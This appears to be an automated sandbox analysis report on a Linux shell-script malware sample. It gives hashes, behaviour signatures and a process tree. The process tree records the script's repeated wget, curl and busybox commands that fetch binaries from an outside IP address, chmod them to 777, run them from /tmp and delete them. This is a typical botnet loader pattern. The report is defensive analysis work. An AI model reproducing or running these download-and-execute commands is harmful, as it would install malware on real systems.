Analysis
-
max time kernel
76s -
max time network
78s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
25/11/2024, 02:58
Static task
static1
Behavioral task
behavioral1
Sample
c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01.sh
-
Size
10KB
-
MD5
48124ab0f7a89c1c97280cd1d95e50fc
-
SHA1
ff70079ce44da76abf68922c5f8361cd17d819a7
-
SHA256
c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01
-
SHA512
5c4601fa8d6ced3bd753fdd73d4e4c272b96a0ee270f6b73aa0e9a24165e2be53a312c8e33de6e0817f5b1ef30ed39cd5382f14f10e2481c5049be72e593ed77
-
SSDEEP
96:u1/LCQIMnbDE0EIP464TrE0YgsvFMnbDE0yc0CgsdIP1t864TrE0pO3LCREo:u1/fI5IP464TrE0YWmPs64TrE0so
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 981 chmod 846 chmod 921 chmod 791 chmod 927 chmod 861 chmod 951 chmod 975 chmod 804 chmod 823 chmod 897 chmod 903 chmod 867 chmod 879 chmod 891 chmod 915 chmod 741 chmod 759 chmod 933 chmod 969 chmod 873 chmod 909 chmod 939 chmod 945 chmod 957 chmod 963 chmod 852 chmod 885 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh 742 AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh /tmp/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI 760 b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI /tmp/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT 792 7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT /tmp/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb 805 wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb /tmp/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H 824 gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H /tmp/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN 847 ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN /tmp/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL 853 cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL /tmp/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A 862 CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A /tmp/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL 868 5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL /tmp/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF 874 OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF /tmp/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI6 880 6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI6 /tmp/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ 886 iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ /tmp/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc 892 jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc /tmp/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r9 898 U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r9 /tmp/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL 904 5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL /tmp/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H 910 gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H /tmp/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN 916 ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN /tmp/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL 922 cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL /tmp/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A 928 CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A /tmp/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r9 934 U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r9 /tmp/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF 940 OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF /tmp/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI6 946 6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI6 /tmp/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ 952 iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ /tmp/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc 958 jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc /tmp/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI 964 b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI /tmp/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh 970 AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh /tmp/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb 976 wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb /tmp/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT 982 7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL curl File opened for modification /tmp/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ curl File opened for modification /tmp/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL curl File opened for modification /tmp/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh curl File opened for modification /tmp/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT curl File opened for modification /tmp/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A curl File opened for modification /tmp/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc curl File opened for modification /tmp/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H curl File opened for modification /tmp/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN curl File opened for modification /tmp/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI6 curl File opened for modification /tmp/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ curl File opened for modification /tmp/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI curl File opened for modification /tmp/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r9 curl File opened for modification /tmp/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh curl File opened for modification /tmp/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN curl File opened for modification /tmp/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI6 curl File opened for modification /tmp/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL curl File opened for modification /tmp/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc curl File opened for modification /tmp/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI curl File opened for modification /tmp/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H curl File opened for modification /tmp/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL curl File opened for modification /tmp/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF curl File opened for modification /tmp/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r9 curl File opened for modification /tmp/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb curl File opened for modification /tmp/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT curl File opened for modification /tmp/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb curl File opened for modification /tmp/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A curl File opened for modification /tmp/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF curl
Processes
-
/tmp/c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01.sh/tmp/c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01.sh1⤵PID:711
-
/bin/rm/bin/rm bins.sh2⤵PID:713
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵PID:715
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵PID:740
-
-
/bin/chmodchmod 777 AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh./AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵PID:743
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵PID:744
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:747
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵PID:754
-
-
/bin/chmodchmod 777 b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI./b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵
- Executes dropped EXE
PID:760
-
-
/bin/rmrm b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵PID:763
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵PID:765
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:773
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵PID:782
-
-
/bin/chmodchmod 777 7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT./7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵
- Executes dropped EXE
PID:792
-
-
/bin/rmrm 7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵PID:795
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵PID:796
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:802
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵PID:803
-
-
/bin/chmodchmod 777 wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb./wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵
- Executes dropped EXE
PID:805
-
-
/bin/rmrm wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵PID:806
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵PID:807
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵PID:817
-
-
/bin/chmodchmod 777 gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H./gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵PID:827
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵PID:829
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:835
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵PID:843
-
-
/bin/chmodchmod 777 ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN./ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵
- Executes dropped EXE
PID:847
-
-
/bin/rmrm ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵PID:848
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵PID:849
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:850
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵PID:851
-
-
/bin/chmodchmod 777 cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL./cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵PID:854
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵PID:855
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵PID:860
-
-
/bin/chmodchmod 777 CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A./CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵PID:863
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵PID:864
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵PID:866
-
-
/bin/chmodchmod 777 5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL./5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm 5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵PID:869
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵PID:870
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵PID:872
-
-
/bin/chmodchmod 777 OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF./OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵PID:875
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵PID:876
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵PID:878
-
-
/bin/chmodchmod 777 6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI6./6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm 6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵PID:881
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵PID:882
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵PID:884
-
-
/bin/chmodchmod 777 iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ./iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵PID:887
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵PID:888
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵PID:890
-
-
/bin/chmodchmod 777 jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc./jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵PID:893
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵PID:894
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵PID:896
-
-
/bin/chmodchmod 777 U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r9./U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵PID:899
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵PID:900
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵PID:902
-
-
/bin/chmodchmod 777 5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL./5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm 5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵PID:905
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵PID:906
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵PID:908
-
-
/bin/chmodchmod 777 gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H./gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵PID:911
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵PID:912
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵PID:914
-
-
/bin/chmodchmod 777 ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN./ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵PID:917
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵PID:918
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵PID:920
-
-
/bin/chmodchmod 777 cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL./cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵PID:923
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵PID:924
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵PID:926
-
-
/bin/chmodchmod 777 CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A./CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵PID:929
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵PID:930
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵PID:932
-
-
/bin/chmodchmod 777 U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r9./U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵PID:935
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵PID:936
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵PID:938
-
-
/bin/chmodchmod 777 OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF./OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵
- Executes dropped EXE
PID:940
-
-
